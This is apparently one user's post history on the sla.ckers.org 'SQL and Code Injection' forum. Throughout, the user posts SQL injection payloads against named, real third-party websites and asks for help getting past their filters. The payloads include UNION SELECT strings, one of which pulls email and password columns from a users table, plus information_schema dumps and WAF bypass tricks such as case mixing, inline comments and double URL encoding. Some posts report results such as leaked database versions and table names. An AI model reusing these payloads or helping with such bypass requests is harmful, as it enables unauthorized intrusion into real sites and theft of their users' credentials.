Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 

Pages: 1234Next
Current Page: 1 of 4
Results 1 - 30 of 93
12 days ago
annen
hXXp://kids.learnoutloud.com/Kids-Catalog/Technology/Computers/Lab-Rats-Video-Podcast/22844 interger I thought it's 49 columns, blocked "Union"
Forum: SQL and Code Injection
15 days ago
annen
Thanks very much ajkaro!
Forum: SQL and Code Injection
28 days ago
annen
1 column
Forum: SQL and Code Injection
28 days ago
annen
http://www.jelco.ca/en/product_detail.php?id=2 Thanks for your help!
Forum: SQL and Code Injection
4 weeks ago
annen
id=-82+union+SELECT 1,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a),2,3,4,5,6....--+
Forum: SQL and Code Injection
4 weeks ago
annen
is a SQLi? I don't think so!
Forum: SQL and Code Injection
5 weeks ago
annen
...... 5.1.48-log pm_view_sub_postpone 5.1.48-log pm_view_supervise 5.1.48-log pm_view_suspend ....... 每页有5条记录 当前页为:1 共有27页 I got it! thanks very much!
Forum: SQL and Code Injection
6 weeks ago
annen
how did you tested it have 3 cols?
Forum: SQL and Code Injection
6 weeks ago
annen
http://www.egova.com.cn/?qa/pid/230/tp/232 and 1=2 union select 1,2,3,version(),5,version() --+- the same with and 0 UNioN(SeLECt(1),2,3,version(),5,version())-- - I think the WAF blocked informaiton_schema.tables Thanks for you help!
Forum: SQL and Code Injection
6 weeks ago
annen
http://www.egova.com.cn/?qa/pid/230/tp/232 and 1=2 union select 1,2,3,4,5,6 --+-
Forum: SQL and Code Injection
1 year ago
annen
http://faucherbotanix.com/detail.php?id=-12 union all select 1,2,3,email,5,password from db110601_cai.users--+-
Forum: SQL and Code Injection
1 year ago
annen
Thanks all the same!
Forum: SQL and Code Injection
1 year ago
annen
Tables found: Departement,Horaire_employe,Jour,circulaires,employe,horaires,produits,semaine,slider no "users" table in current db. you'd find which db have the table "users"!
Forum: SQL and Code Injection
1 year ago
annen
http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=53.0' UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12--+ 5.5.17 but cann't get database() and version(),and cann't get column_name or table_name I have tried many methords to bypass ,but it doesn't work! Thanks for your kindness replay!
Forum: SQL and Code Injection
1 year ago
annen
http://www.urbannovember.org/conference/rst.php?op=about_rst&cf=2&id=31' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30​,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53--+- cann't have a valiable column.I know it can use blind ,but I want to know if UNION methord or error base methord can use or not .
Forum: SQL and Code Injection
1 year ago
annen
http://www.scnutrition.org/index.php?ax=view&id=119 union select1,2,3 500 server error ,when I use overflow methord it doesn't work! can you help me to bypass this? Thanks a lot!
Forum: SQL and Code Injection
2 years ago
annen
thanks!
Forum: SQL and Code Injection
2 years ago
annen
hard!
Forum: SQL and Code Injection
2 years ago
annen
name_const cant' get schema_name,but floor(rand(0)*2)can
Forum: SQL and Code Injection
2 years ago
annen
Thanks!
Forum: SQL and Code Injection
2 years ago
annen
Sorry, This is not a WAF ,but a SQLi myslq<4!
Forum: SQL and Code Injection
2 years ago
annen
http://www.nbcffc.com/zt_news/index.php?id=24 column number 3
Forum: SQL and Code Injection
2 years ago
annen
http://www.zug4you.ch/cms/file.php ?PHPSESSID=4afbd15e53033b39eb6fbeb04234dcb8 &id=24 unIoN SEleCT 1,2,3,4,5,6,7,8--+- I tried /*!*/、 /*!12345*/、URLencode、double URLencode、*、() but it didn't work! Please help me!
Forum: SQL and Code Injection
2 years ago
annen
http://www.aeaweb.org/articles.php?doi=10.1257/jel.50.1.51
Forum: SQL and Code Injection
2 years ago
annen
http://www.cbds.org.br/noticias.php?id=132 You have an error in your SQL syntax; http://www.cbds.org.br/noticias.php?id=132 or 1 GroUp by concat_ws(0x00,vesion(),floor(rand(0)*2)) having min(0) or 1--+- cann't work!
Forum: SQL and Code Injection
2 years ago
annen
Thanks! It filted "(" and ")" !
Forum: SQL and Code Injection
2 years ago
annen
dear thanggiangho how did you get it ?
Forum: SQL and Code Injection
Pages: 1234Next
Current Page: 1 of 4